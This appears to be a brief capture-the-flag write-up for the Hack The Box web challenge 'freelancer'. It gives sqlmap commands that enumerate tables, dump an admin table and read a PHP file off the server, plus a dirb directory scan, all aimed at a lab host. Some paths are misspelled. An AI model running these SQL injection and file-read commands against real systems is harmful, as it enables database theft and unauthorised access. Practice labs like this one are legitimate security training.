HTB WEB freelancer
1 min readNov 18, 2019
from source code we found portfolio.php?id=3
so lets try sql injection
sqlmap -u “http://docker.hackthebox.eu:30596/portfolio.php?id=3” — tables
we see table called safeadmin
sqlmap -u “http://docker.hackthebox.eu:30596/portfolio.php?id=3” -T safeadmin — dump
will find hash uncrackable
from source we also found /admininstrat
dirb http://docker.hackthebox.eu:30596/administrat/ -X .php
we found the file /panel.php
sqlmap -u “http://docker.hackthebox.eu:30596/administrat/panel.php” — file-read=/var/www/html/administat/panel.php then cat that file
below the page u will find the flag